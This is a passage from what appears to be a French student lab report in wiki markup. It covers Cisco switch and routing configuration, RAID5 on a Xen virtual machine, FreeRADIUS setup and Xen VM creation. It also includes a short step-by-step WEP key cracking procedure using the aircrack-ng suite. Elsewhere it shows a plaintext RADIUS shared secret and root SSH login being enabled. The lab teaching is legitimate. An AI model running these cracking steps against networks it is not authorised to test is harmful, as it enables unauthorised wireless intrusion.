 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== 3 Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== 3.1 L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== 3.2 Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
